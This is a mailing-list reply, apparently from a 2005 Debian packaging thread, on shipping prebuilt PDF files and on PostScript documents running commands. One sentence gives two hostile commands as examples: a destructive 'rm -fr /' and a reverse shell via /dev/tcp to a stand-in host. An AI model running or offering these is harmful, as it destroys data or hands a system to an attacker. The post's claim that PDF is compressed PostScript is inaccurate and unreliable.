Re: pdf files in upstream tarball and -doc package
Postscript (.ps) is a "programming language". If documents aren't
handled properly, its a security issue. This is different from the
buffer overflows in xpdf and such, which are also exploitable by
malicious documents. Here, no compromize of the PS software (a la
stack smash) is necessary. The PS software simply lets you run a
command (like rm -fr /, or sh </dev/tcp/mallory.com/1337 or whatever
else).
PDF is compressed postscript, so I figure that the same applies. I
wonder if it is lossy compression? Anyways, I just found
http://www.kde.org/info/security/advisory-20030409-1.txt
Justin
On Thu, Feb 10, 2005 at 11:47:51PM +0100, Miriam Ruiz wrote:
> --- Justin Pryzby
> <justinpryzby@users.sourceforge.net> escribió:
>
> > PDF can be trojaned, so you should at least *provide* a way to
> > generate them from their sources, even if that makefile rule is
> > not called by default, and the additional build-dependencies are
> > just a note in debian/rules.
>
> In case only PDF files were provided, or PDF provided came from .doc
> files or something like that, is it OK to include them? I didn't
Strictly speaking, no, because its a generated file, and you didn't
compile it from preferred-form source-code.
Reply to: